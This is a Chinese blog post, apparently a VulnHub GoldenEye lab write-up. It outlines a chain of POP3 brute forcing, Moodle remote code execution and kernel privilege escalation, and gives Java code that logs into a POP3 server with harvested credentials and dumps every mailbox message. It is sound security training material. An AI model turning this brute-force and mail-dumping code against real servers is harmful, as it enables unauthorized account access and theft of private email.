前段时间在Freebuf上读到大佬的《OSCP学习经验分享》,其中推荐了一些vulnhub上的靶机,笔者下载了排在其中第一位的GoldenEye靶机,并进行了一波渗透,编写了相应的漏洞利用程序(Exploit)。
鄙人学艺不精,但是对Java编程有所了解,参见了某国外大佬的WriteUP,写下了一套Exploit。
WriteUp中主要使用了简单的社会工程技巧来收集账户信息,暴力破解POP3口令,在邮件中检索信息最终登录站点超管账号,利用了Moodle2.2.3的拼写检查引擎来远程执行代码,最终利用Overlayfs漏洞成功提权,拿下root。
0x00 POP3协议简介
POP3(Post Office Protocol 3),是一种基于TCP协议的电子邮件协议,默认端口为110 。
POP3常用命令列表,更多命令请参见POP3百度百科
USER <用户名> #指定要认证的用户名
PASS <密码> #输入密码
STAT # 请求邮箱的统计资料,如邮件总数和总字节数
LIST #列出邮件简略信息
RETR <编号> #请求编号对应的邮件正文
0x01 批量dump邮件思路
获取邮件正文主要过程如下
用户认证 -> 请求邮件统计信息 -> 读取所有邮件正文
因为POP3的认证过程比较简单,可以自己非常方便地编写一个爆破脚本,主要过程如下(比较简单,可以自己试着动手实现)
1.USER命令 指定用户名
2.PASS命令 验证密码
3.根据服务器响应,判断认证结果
认证通过后,下载邮件正文
4.STAT命令 获取邮件统计信息
5.RETR命令 遍历邮箱,下载邮件
0x02 代码编写
这里用Java编写一个POP3类来实现邮件相关的操作
import java.io.*;
import java.net.InetSocketAddress;
import java.net.Socket;
import java.net.SocketAddress;
public class POP3 {
private Socket socket = new Socket(); //初始化一个Socket,后续建立网络连接
private BufferedReader br = null;
private BufferedWriter bw = null;
//连接到POP3服务器
public boolean connect(String host,int port) {
try {
SocketAddress sa = new InetSocketAddress(host,port);
this.socket.connect(sa,5); //使用SA来连接,可以设置超时
//初始化br和bw用于输入输出
this.br = new BufferedReader(
new InputStreamReader(socket.getInputStream())
);
this.bw = new BufferedWriter(
new OutputStreamWriter(socket.getOutputStream())
);
System.out.println("[+] 连接成功");
return true;
} catch (IOException e) {
//e.printStackTrace();
System.out.println("[-] 连接失败");
}
return false;
}
//用户认证
public boolean login(String user,String pass){
try {
//读掉Banner
br.readLine();
bw.write("USER " + user); //输入用户名
bw.newLine(); //回车
bw.flush(); //刷新缓冲区,使命令马上发送
if (br.readLine().toUpperCase().contains("OK")) {
bw.write("PASS " + pass); //输入密码
bw.newLine();
bw.flush();
if (br.readLine().toUpperCase().contains("OK")) { //服务端返回OK+则成功
System.out.println("[+] 认证成功");
return true;
} else {
System.out.println("[+] 认证失败");
}
}
} catch (IOException e) {
//e.printStackTrace();
System.out.println("[+] 认证异常");
}
return false;
}
//下载邮件正文
public void dumpMail() {
try {
bw.write("STAT"); //请求邮件统计信息
bw.newLine();
bw.flush();
//获取邮件总数
int num = Integer.valueOf(br.readLine().split(" ")[1]);
//遍历邮件
for (int i=1;i <=num;i++) {
System.out.println("[+] 第"+ i +"封邮件");
bw.write("RETR " + i); //获取邮件正文
bw.newLine();
bw.flush();
String line = null;
//读出邮件正文
while ((line = br.readLine()) != null) {
if (!line.startsWith(".")) {
System.out.println(line);
} else {
break;
}
}
}
} catch (IOException e) {
e.printStackTrace();
}
}
}在main方法中实例化POP3对象,下载邮件
public class Main {
public static void main(String[] args) {
POP3 pop3 = new POP3();
pop3.connect("192.168.180.130",55007);//靶机IP,端口
if (pop3.login("natalya","bird")){
pop3.dumpMail();
}
}
}0x03 编译代码,运行
javac Main.java
java Main
0x04 结语
感谢阅读。POP3协议比较简单,爆破和进行一些自动化操作也比较容易,很适合新手拿来练手,深入地了解应用层协议的通信过程。SMTP协议的爆破请参考笔者高中时攥写的另一篇文章。
1 Response
[…] Java Exploit编写——GoldenEye篇(上) […]